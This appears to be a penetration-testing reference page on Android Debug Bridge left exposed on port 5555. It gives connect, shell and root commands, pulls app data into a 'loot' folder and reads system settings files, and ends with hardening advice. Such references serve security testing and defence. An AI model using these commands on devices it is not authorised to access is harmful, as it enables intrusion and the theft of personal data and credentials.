Android Debug Bridge (ADB)
aka android
ADB over TCP on 5555. When left enabled (TVs, emulators, IoT, rooted phones) it grants an unauthenticated root-capable shell — connect and you have a full device shell, file access and app install.
Ports
| Port | Proto | Notes |
|---|---|---|
5555 | tcp | ADB over TCP |
Fingerprint
- nmap adb-* / banner identifies the Android device
- adb connect succeeds with no prompt
Exploitation primitives
- adb connect → unauthenticated interactive shell
- adb root / adb shell for full device access; pull app data and credentials
- Install a malicious APK or run commands (often as root on emulators/IoT)
Overview
ADB on 5555 is Android’s debug interface. Exposed over the network it needs no authentication — you get a shell, frequently with root, on phones, TVs, emulators and IoT.
Enumeration
Connect:
adb connect <TARGET>:5555Confirm + open a shell:
adb devices && adb shellLoot & escalate
Try root:
adb rootPull files / app data:
adb pull /data/data/<package>/ ./loot/Run a command:
adb shell "id; cat /data/system/users/0/settings_secure.xml"Hardening
Disable “ADB over network”, never expose 5555, and require authorised-key confirmation for USB debugging.